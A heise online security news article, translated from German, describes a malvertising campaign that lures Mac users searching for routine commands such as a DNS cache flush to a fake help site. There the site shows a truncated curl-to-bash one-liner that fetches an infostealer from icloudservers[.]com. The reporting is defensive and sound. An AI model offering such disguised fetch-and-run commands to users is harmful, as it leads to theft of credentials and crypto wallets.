heise PlusAbo
Anzeige

Malvertising: Search for standard commands for Macs delivers Infostealer

Cunning scam: When searching for standard commands for macOS, pages appear that display commands for installing malware.

listen Print view
Magnifying,Glass,Enlarging,Malware,In,Computer,Machine,Code

(Image: Balefire / Shutterstock.com)

2 min. read
Security
By

Cybercriminals are currently using a perfidious scam online to trick unsuspecting users into installing malware. When searching for standard commands for macOS, the results lead to websites that display commands – instead of executing the function searched for, but embed the Infostealer in the system.

Advertising on the search results leads to a malware page.

(Image: heis eonline / cku)

For example, a search on Google for the macOS command to flush the DNS cache using "mac flush dns cache" returns a web page in the results list advertisement that purports to explain the command. After clicking, the URL mac-safer[.]com shows how to call the command.

The advertised website displays a command that downloads and installs malware.

(Image: heise online / cku)

However, the command begins /bin/bash -c "$(curl -fsSL $(echo... and bears no resemblance to the usual commands for deleting DNS caches(sudo dscacheutil -flushcache; sudo killall -HUP mDNSResponder – where the call with sudo legitimately leads to a password query). The website also announces that the password will be requested when the command is called. Here, however, this is done with malicious intent.

Malvertising: Command loads and installs Infostealer

However, the command does not clear out the DNS cache, but downloads a malicious program from "icloudservers[.]com" with the name "install.sh". The script is executed and asks for the password, which it checks with the "dscl" command, and starts the "update" file. According to Virustotal detections, only a few virus scanners are able to detect this as an info stealer, which is therefore targeting information. Classically, this involves access data to services, but crypto wallets are also often targeted by such malware.

Videos by heise

On the malicious website, the masterminds also offer supposed solutions for other problems.

The malicious website advertised provides supposed solutions to other problems. All of them distribute malware, of course.

(Image: heise security / ju)

One ironic example is the subpage "How to Remove Malware from Your Mac" – which is apparently supposed to work with the Infostealer malware. But the website also covers other common search queries: Solving Mac overheating problems, freeing up disk space on your Mac, getting a non-functioning camera working on your Mac, and various more.

Read also

Malvertising remains a persistent problem. At the beginning of the year, for example, criminals tried to use an imitation of the Homebrew website to trick Mac users into downloading malicious code.

(dmk)

Don't miss any news – follow us on Facebook, LinkedIn or Mastodon.

This article was originally published in German. It was translated with technical assistance and editorially reviewed before publication.

Beliebte Bestenlisten

Alle Angebote
Newsletter heise-Bot heise-Bot Push Nachrichten Push Push-Nachrichten